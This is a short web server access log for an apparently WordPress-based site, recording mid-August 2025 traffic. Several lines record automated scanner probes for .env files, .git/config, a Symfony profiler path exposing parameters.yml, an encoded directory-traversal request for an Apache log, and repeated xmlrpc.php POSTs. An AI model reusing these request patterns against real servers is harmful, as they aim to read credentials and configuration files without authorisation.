185.177.72.56 - - [13/Aug/2025:14:10:43 +0800] "GET /api/register HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.56 - - [13/Aug/2025:14:10:44 +0800] "GET /api/.env HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.56 - - [13/Aug/2025:14:10:45 +0800] "GET /login?pp=enable&pp=env HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.56 - - [13/Aug/2025:14:10:46 +0800] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.56 - - [13/Aug/2025:14:10:48 +0800] "GET /app HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.56 - - [13/Aug/2025:14:10:49 +0800] "GET /app/.env HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
193.34.212.110 - - [13/Aug/2025:14:13:07 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.81.248.84 - - [13/Aug/2025:14:14:56 +0800] "GET /.git/config HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
49.51.180.2 - - [13/Aug/2025:14:17:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.180.2 - - [13/Aug/2025:14:17:47 +0800] "GET / HTTP/1.1" 200 33397 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
92.205.182.254 - - [13/Aug/2025:14:21:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [13/Aug/2025:14:44:36 +0800] "POST /wp-cron.php?doing_wp_cron=1755067476.1967580318450927734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
8.29.157.192 - - [13/Aug/2025:14:44:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
217.182.158.226 - - [13/Aug/2025:14:45:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.108.119 - - [13/Aug/2025:14:55:51 +0800] "HEAD /password.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
43.135.133.241 - - [13/Aug/2025:14:56:51 +0800] "GET / HTTP/1.1" 200 33397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.177.72.7 - - [13/Aug/2025:14:57:20 +0800] "GET /.git/HEAD HTTP/1.1" 404 9423 "-" "-"
185.177.72.7 - - [13/Aug/2025:14:57:20 +0800] "GET /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.7 - - [13/Aug/2025:14:57:21 +0800] "GET /admin.html HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.7 - - [13/Aug/2025:14:57:21 +0800] "GET /wp-content HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.7 - - [13/Aug/2025:14:57:21 +0800] "GET /wp-content/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
